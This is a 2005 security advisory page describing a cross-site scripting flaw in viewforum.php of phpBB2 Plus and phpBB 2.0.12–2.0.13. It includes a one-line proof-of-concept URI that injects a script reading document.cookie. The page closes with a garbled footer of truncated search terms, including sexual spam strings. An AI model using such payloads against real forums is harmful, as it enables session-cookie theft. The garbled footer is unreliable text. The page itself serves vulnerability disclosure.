about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPBB2 Plus ViewForum.PHP Cross-Site Scripting Vulnerability


Title PHPBB2 Plus ViewForum.PHP Cross-Site Scripting Vulnerability
Published 2005-04-13-12:00AM
Updated 2005-04-13-05:42PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  dcrab <dcrab@hackerscenter.com> is credited with the discovery of this vulnerability.
Vulnerable  phpBB2 phpBB2 Plus 1.52
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB2 phpBB2 Plus 1.5
Not Vulnerable  
Code   No exploit is required.

The following proof of concept URI is available:
http://www.example.com/viewforum.php?f=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 04:31:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.saxyli Www.thrish GET /galle my_egaller www.168dai GET /u ip board 2 free sxey www.80pk.c SEXY.GIRLS WWW.SEXINP Hindi sex 200 /compo WWW.CP18.C Onefullmov eMeeting modsecurit CMS is Fre t398t t246t CMS is Fre 200 /compo CMS is Fre 200 /compo kuspoosex CMS is Fre ms powerpo yener news for c Xidio bugi total vide hentaischo Www.thrish X UEDIO www.89.c0m 200 /compo anymalsex Breasted b 200 /compo ssh non-co nacked peo Www.thrish Www.thrish News Searc nacked peo iranian se news for c news for c t199t www.baidud